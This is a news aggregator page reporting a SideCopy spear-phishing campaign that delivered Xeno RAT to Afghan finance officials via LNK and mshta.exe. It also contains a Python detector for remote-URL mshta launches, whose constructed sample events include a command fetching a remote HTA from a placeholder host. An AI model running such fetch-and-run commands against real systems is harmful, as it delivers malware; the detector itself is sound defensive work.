Security News

Cybersecurity news aggregator

HIGH | Attacks | SC Media

SideCopy group targets Afghanistan's Ministry of Finance with Xeno RAT

The Pakistan-aligned SideCopy APT group targeted Afghanistan's Ministry of Finance via a spear-phishing campaign delivering a malicious LNK file, which leveraged mshta.exe to download an HTA payload and ultimately deploy the open-source Xeno RAT (version 1.8.7) for remote command execution and data exfiltration. The attack chain used compromised Afghan domains and language-specific lures to enhance its effectiveness. This operation represents a continuation of the group's focus on South Asian governmental targets.
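The chain summarized above (LNK opened from Explorer, mshta.exe fetching a remote HTA) is a well-known living-off-the-land pattern that is visible in ordinary process-creation telemetry. The following is an added detection example, not code from SC Media, The Hacker News or Seqrite Labs: it scans constructed process-creation events (fields modelled on Sysmon Event ID 1's ParentImage, Image and CommandLine) and flags mshta.exe launched with a remote URL, rating the hit higher when the parent is a user-facing program such as Explorer or Office. The event format, the sample lines and the `example.invalid` hostnames are all constructed for illustration; no indicator from the reported campaign is used.

```python
import re
from dataclasses import dataclass

# Matches an http/https/ftp URL anywhere in the command line. Legitimate
# installers typically run mshta.exe against a local .hta path, so a remote
# URL is the discriminating feature, not mshta.exe itself.
REMOTE_URL = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)

# Parents from which an mshta launch with a remote URL most often means a
# user opened a lure: a LNK double-clicked in Explorer, or an Office document.
USER_FACING_PARENTS = {
    "explorer.exe", "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
}

# Constructed sample events (not real telemetry): "ParentImage|Image|CommandLine".
SAMPLE_EVENTS = [
    # LNK launched from Explorer; mshta pulls a remote HTA (the pattern in the article).
    "C:\\Windows\\explorer.exe|C:\\Windows\\System32\\mshta.exe|"
    "mshta.exe https://edu-site.example.invalid/update.hta",
    # Benign: a vendor installer opening a local HTA wizard.
    "C:\\Program Files\\Vendor\\setup.exe|C:\\Windows\\System32\\mshta.exe|"
    "mshta.exe \"C:\\Program Files\\Vendor\\wizard.hta\"",
    # Remote HTA from a script-hosted parent: still worth a look, lower confidence.
    "C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\mshta.exe|"
    "mshta http://cdn.example.invalid/x.hta",
    # Unrelated process, should be ignored.
    "C:\\Windows\\explorer.exe|C:\\Windows\\System32\\notepad.exe|notepad.exe report.txt",
]


@dataclass
class Finding:
    index: int       # position of the event in the input list
    parent: str      # lower-cased parent image basename
    url: str         # remote URL found on the command line
    severity: str    # "high" for user-facing parents, else "medium"


def _basename(path: str) -> str:
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_event(line: str):
    """Split one constructed 'parent|image|cmdline' record into its three fields."""
    parent, image, cmdline = line.split("|", 2)
    return parent, image, cmdline


def detect_remote_mshta(events):
    """Return a Finding for every mshta.exe launch whose command line carries a remote URL."""
    findings = []
    for i, line in enumerate(events):
        parent, image, cmdline = parse_event(line)
        if _basename(image) != "mshta.exe":
            continue
        match = REMOTE_URL.search(cmdline)
        if not match:
            continue  # local HTA: common for legitimate installers, not flagged here
        severity = "high" if _basename(parent) in USER_FACING_PARENTS else "medium"
        findings.append(Finding(i, _basename(parent), match.group(0), severity))
    return findings


if __name__ == "__main__":
    for f in detect_remote_mshta(SAMPLE_EVENTS):
        print(f"event {f.index}: {f.severity.upper()} mshta.exe <- {f.parent} fetching {f.url}")
```

In a real deployment the same logic maps directly onto a SIEM query over Sysmon Event ID 1 or Windows Security event 4688 (with command-line auditing enabled); the URL regex is deliberately broad because the reported chain reached a compromised legitimate domain, so allow-listing by hostname would not have helped.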

Threat Intelligence | June 2, 2026 | By SC Staff

As reported by The Hacker News, a spear-phishing campaign, likely orchestrated by the Pakistan-aligned SideCopy group, has been identified targeting Afghanistan's Ministry of Finance with the open-source remote access trojan Xeno RAT. This operation, codenamed Operation XENOFISCAL and analyzed by Seqrite Labs, also ensnared provincial revenue and finance directorates, along with Pashto-speaking government officials.

The campaign commences with a spear-phishing email containing a ZIP archive with a malicious LNK file written in Pashto, designed to exploit the familiarity of the language within the Afghan government. Upon execution, the LNK file uses mshta.exe to download a remote HTML Application (HTA) from a compromised Afghan education domain, leading to the execution of obfuscated JavaScript. The malware then establishes persistence by mimicking Microsoft Edge, dropping Xeno RAT 1.8.7 and a decoy document via a DLL loader.

Xeno RAT is capable of remote command execution, data exfiltration, network tunneling, and system monitoring, including keystroke logging and screenshot capture. SideCopy, part of the broader Transparent Tribe (APT36) umbrella, has previously targeted Indian entities with similar malware. This campaign represents a continuation of malicious cyber activity focused on South Asian targets.

Source: The Hacker News

Related Threat Intelligence

Russian hackers exploit WinRAR vulnerability for data theft (SC Staff, June 2, 2026): The exploitation chain begins with a weaponized HTML Application payload called GammaPhish, which retrieves intermediate Visual Basic Script (VBScript) downloaders known as GammaLoad, according to Sekoia.

Crypto whales and executives face rising physical attacks (SC Staff, June 1, 2026): The public ledger that underpins cryptocurrency, while enabling transparency, also exposes wealthy holders, known as whales, to identification and targeting by hackers and con artists.

Digital Intelligence Lab launches observatory to connect cyber events with geopolitical context (SC Staff, June 1, 2026): The DIL Observatory maps cyber incidents, including ransomware attacks, data breaches, and cyber militia activity, alongside their geopolitical and social contexts.
